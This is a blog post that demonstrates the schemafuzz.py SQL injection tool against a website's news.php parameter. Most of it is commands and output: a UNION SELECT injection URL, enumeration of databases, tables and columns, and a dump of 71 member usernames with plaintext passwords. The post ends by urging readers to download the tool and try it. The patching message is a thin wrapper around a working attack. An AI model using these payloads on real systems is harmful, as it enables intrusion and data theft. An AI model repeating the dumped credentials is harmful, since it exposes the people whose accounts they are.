All About How To

Hi all, in this post,as my another post that telling about a web security, I think I have to post this to you. Because if you do not patch your web security, your web will easily cracked by someone. Maybe your web will be defaced, or your database will being stolen. And you what happen then…your web will lost any google adsense or everythin you got from SEO. I’m sure you don’t want this happen.

I’m try to reveal my experiment using schemafuzz. I never try SQL injection with this tool before. I just found it at http://whitesecure.com. So, in this experiment, I think this is a cool stuff from darkc0de that you should try. All we need for use this tool is, a python compiler. For Linux user, python is a default programming language so we don’t have to installing it. But, for Win***s user, please download it here.

So, let’s begin :

root@bt:~# python schemafuzz.py -u http://myownsite.me/news.php?id=1561 –findcol

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL: http://myownsite.me/news.php?id=1561–
[+] Evasion Used: “+” “–”
[+] 06:15:17
[-] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,1,2,3,4,5–
[+] darkc0de URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!

root@bt:~# python schemafuzz.py -u http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5 –dbs

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 06:17:31
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: css_mycss
User: css_mycss@localhost
Version: 5.0.51a-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0] css_mycss
[1] test

[-] 06:17:50
[-] Total URL Requests 4
[-] Done

Don’t forget to check schemafuzzlog.txt

root@bt:~# python schemafuzz.py -u http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5 –schema -D css_mycss

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 06:19:09
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: css_mycss
User: css_mycss@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database “css_mycss”
[+] Number of Tables: 36

[Database]: css_mycss
[Table: Columns]

[0]addressbook: id,cat_id,cat_id2,cat_id3,update_date,submit_date,name,person,ic,gender,add1,add2,add3,tel,hp,fax,username,password,email,note
[1]addressbook_cat: id,sub_id,name
[2]addressbook_pc: id,add_id,submit_date,name,cpu,ram,hd,vga,sound,cdrom,drive,keyboard,mouse,usb,port,networking,os,antivirus
[3]addressbook_pc_report: id,add_id,submit_date,name,note
[4]cat: id,name,image,visit,bodytag,keyword,desc,description
[5]consignment: id,customer_id,borrow,name,user
[6]enquiry: user_id,area_id,update_date,submit_date,company,name,gender,add1,add2,postcode,home,office,fax,mobile,email,ic,passport,nationality,os,dealer,note
[7]enquiry_area: id,parent_id,top_id,name
[8]faq: id,cat_id,question,answer
[9]faqcat: id,name,visit,description
[10]hosting: id,update_date,name,owner,dealer,server_id,expire,price,note
[11]hostingserver: id,name
[12]invoice_item: id,invoice_id,update_date,submit_date,name,description,qty,price
[13]logs: id,date,name,description
[14]logs_hr: id,date,name,description
[15]member: id,area_id,update_date,submit_date,company,name,gender,add1,add2,username,office,fax,password,email,level,note,staff,dealer,hosting,member
[16]member_leave: id,member_id,update_date,submit_date,leave_date,name,status,note,total_day
[17]member_report: id,member_id,update_date,submit_date,report_date,name,report,total_hour
[18]member_sales: id,member_id,sales_id,update_date,submit_date,sales_date,account_date,bankin_date,name,note,payment,price,cost,profit
[19]member_task: id,customer_id,member_id,leader_id,access_id1,access_id2,access_id3,update_date,submit_date,followup_date,complete_date,name,status,note
[20]member_task_report: id,member_id,task_id,update_date,submit_date,note,time
[21]member_type: id,parent_id,top_id,name
[22]news: id,name,description,submit_date,update_date,visit
[23]package: id,name
[24]package_item: id,package_name_id,product_id
[25]package_name: id,package_id,name
[26]payment: id,update_date,submit_date,invoice_date,name,note,total,sold,paid
[27]po: id,customer_id,update_date,submit_date,name,username
[28]po_item: id,po_id,update_date,name,description,qty,retail,price,note,username
[29]products: id,date1,visit,name1,name2,weight,cat1,cat2,type1,type2,description,image1,image2,price,price_us,offer,dealer,wholesale,cost,note,seller,bodytag,code,date2,date3,stock,stock1,stock2,stock3
[30]products_reserve: id,product_id,customer_id,update_date,submit_date,name,taken_date,username
[31]quotation: id,cat_id,customer_id,dealer_id,update_date,submit_date,quotation_date,invoice_date,po_date,name,invoice,username,remark,regards
[32]quotation_cat: id,sub_id,name
[33]quotation_item: id,quotation_id,update_date,name,description,qty,price,cost,note,username
[34]stock: id,product_id,update_date,submit_date,name,username,log
[35]type: id,name,image,visit,bodytag

[-] 06:45:44
[-] Total URL Requests 315
[-] Done

Don’t forget to check schemafuzzlog.txt

root@bt:~# python schemafuzz.py -u http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5 –dump -D ccs_myccs -T member -C id,username,password

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL: http://myownsite.me/news.php?id=1561+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5–
[+] Evasion Used: “+” “–”
[+] 06:51:41
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: css_mycss
User: css_mycss@localhost
Version: 5.0.51a-community
[+] Dumping data from database “css_mycss” Table “member”
[+] and Column(s) ['id', 'username', 'password']
[+] Number of Rows: 71

[0] 1:cwtan:213:
[1] 2:fkyoon:jk45gb:
[2] 3:xtremecom:hasegawa:
[3] 4:kevinloh:nbv354:
[4] 5:jasonwong:vgb54n:
[5] 20:jeffery_yeoh:sc8bq1:
[6] 7:gtlau:fv62bx:
[7] 8:johan:ndxm532:
[8] 9:mohamed:hdx43n:
[9] 10:johnathan:jsch82d:
[10] 11:jamesgoh:s45xh2:
[11] 34:sean:dsc23:
[12] 13:phchan:ph118:
[13] 14:pccmy:suc51f:
[14] 23:ckphuah:s45f8:
[15] 15:cg-computers:hdxe45:
[16] 16:armen:h2dz52:
[17] 17:matthew:sc25x3:
[18] 18:kyzee:ds5jk7:
[19] 19:george:dh9n2m:
[20] 31:wooijin:wooijin:
[21] 22:raymond-liew:sf28b:
[22] 24:andrewgark:sc19nv:
[23] 25:jamil:sdc739:
[24] 26:irene_tew:kxn349:
[25] 27:chenlung:xun329:
[26] 28:ericlim:un39xv:
[27] 29:tradewinds:sdcb348:
[28] 30:myben:830712b:
[29] 32:brian:jxn267:
[30] 39:elongnet:ds5x8:
[31] 40:shabbir:scvs321h:
[32] 41:evergreen:sdfx125:
[33] 43:raymondlee:xh37b3:
[34] 44:cheryl:bds518:
[35] 45:gadgetzone:asd24h:
[36] 46:dmitri:gb536:
[37] 47:syedali:21gh4:
[38] 48:level3:213:
[39] 49:izmir:hgd752:
[40] 50:izwan:fhdr352:
[41] 51:ooigheetiong:njds641:
[42] 52:thenoiho:dsh629k:
[43] 53:desai:kdie83:
[44] 54:giapseng:sx4k8:
[45] 55:lionel:lionel6:
[46] 56:adrain:
[47] 57:iscc:nhfd63:
[48] 58:rovinlim:sdx413:
[49] 59:maxlee:fkpq134:
[50] 60:syukri:t5u7w2:
[51] 61:jaclyn:vgx216:
[52] 62:davidteoh:tr431k:
[53] 63:yeapch:dx164:
[54] 64:adrianquah:fgzu72:
[55] 65:jameskuick:sg623k:
[56] 66:raymondooi:she369:
[57] 67:cgcomputers:gxk518:
[58] 68:yckai:jh763:
[59] 80:lltan:x41jk8:
[60] 70:kltan:sdk327:
[61] 71:myitech:hgk967:
[62] 72:vss:fxs523:
[63] 73:atconsulting:sc42h6:
[64] 74:skfcomp:sd15h6:
[65] 75:hjwang:crdy483:
[66] 76:cheoh:peb357:
[67] 77:saidatul:sdt528:
[68] 78:shofi:sx39n43:
[69] 79:dynacomb:x4f5k2:
[70] 81:lltan:x41jk8:
[71] No data

[-] 06:55:38
[-] Total URL Requests 73
[-] Done

Don’t forget to check schemafuzzlog.txt

That’s it…

Quite simple, don’t u? What u waiting for? go to http://darkc0de.com to download it. Or just click here.